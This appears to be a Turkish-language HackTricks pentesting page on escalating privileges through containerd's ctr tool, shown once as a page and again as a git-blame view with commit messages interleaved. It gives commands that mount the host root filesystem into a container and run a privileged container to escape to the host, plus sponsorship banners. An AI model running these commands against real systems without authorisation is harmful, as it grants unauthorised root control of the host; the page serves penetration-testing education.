hacktricks/linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md

# Containerd (ctr) Yetki Yükseltme

{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>
{% endhint %}

## Temel bilgiler

**Containerd** ve `ctr`'nin ne olduğunu öğrenmek için aşağıdaki bağlantıya gidin:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
{% endcontent-ref %}

## PE 1

Bir ana bilgisayarda `ctr` komutunu içerdiğini bulursanız:
```bash
which ctr
/usr/bin/ctr
```
Resimleri listeleyebilirsiniz:

```bash
ctr images ls
```
```bash
ctr image list
REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
```
Ve sonra **bu görüntülerden birini çalıştırarak ana makine kök klasörünü bağla**:
```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
```
## PE 2

Bir konteyneri ayrıcalıklı olarak çalıştırın ve ondan kaçın.\
Ayrıcalıklı bir konteyneri şu şekilde çalıştırabilirsiniz:
```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
```
Sonra, ayrıcalıklı yetenekleri kötüye kullanarak ondan kaçmak için aşağıdaki sayfada belirtilen tekniklerden bazılarını kullanabilirsiniz:

{% content-ref url="docker-security/" %}
[docker-security](docker-security/)
{% endcontent-ref %}

{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.

</details>
{% endhint %}
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								# Containerd (ctr) Yetki Yükseltme
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												a

											
										
										
											2024-02-02 12:19:57 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
 								* **Hacking püf noktalarını paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Temel bilgiler
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								**Containerd** ve `ctr`'nin ne olduğunu öğrenmek için aşağıdaki bağlantıya gidin:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
 								[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## PE 1
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								Bir ana bilgisayarda `ctr` komutunu içerdiğini bulursanız:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								which ctr
 								/usr/bin/ctr
 								```
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								Resimleri listeleyebilirsiniz:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								```bash
 								ctr images ls
 								```
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								ctr image list
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								REF                                  TYPE                                                 DIGEST                                                                  SIZE      PLATFORMS   LABELS
 								registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
 								registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								Ve sonra **bu görüntülerden birini çalıştırarak ana makine kök klasörünü bağla**:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
 								ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
 								```
-												GitBook: [#3160] No subject

											
										
										
											2022-05-01 13:25:53 +00:00
+								## PE 2
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Bir konteyneri ayrıcalıklı olarak çalıştırın ve ondan kaçın.\
 								Ayrıcalıklı bir konteyneri şu şekilde çalıştırabilirsiniz:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```bash
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
+								```
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								Sonra, ayrıcalıklı yetenekleri kötüye kullanarak ondan kaçmak için aşağıdaki sayfada belirtilen tekniklerden bazılarını kullanabilirsiniz:
-												GitBook: [master] 423 pages and 2 assets modified
											
										
										
											2021-01-03 00:43:09 +00:00
-												GITBOOK-3863: change request with no subject merged in GitBook

											
										
										
											2023-04-05 15:16:57 +00:00
+								{% content-ref url="docker-security/" %}
 								[docker-security](docker-security/)
-												GitBook: [#2777] gitbookissooooo slow I cannot write

											
										
										
											2021-10-18 11:21:18 +00:00
+								{% endcontent-ref %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												a

											
										
										
											2024-02-02 12:19:57 +00:00
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
 								* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['1911-pentesting-fox.md', '6881-udp-pentesting-bittorrent.md

											
										
										
											2024-07-18 18:41:33 +00:00
+								{% endhint %}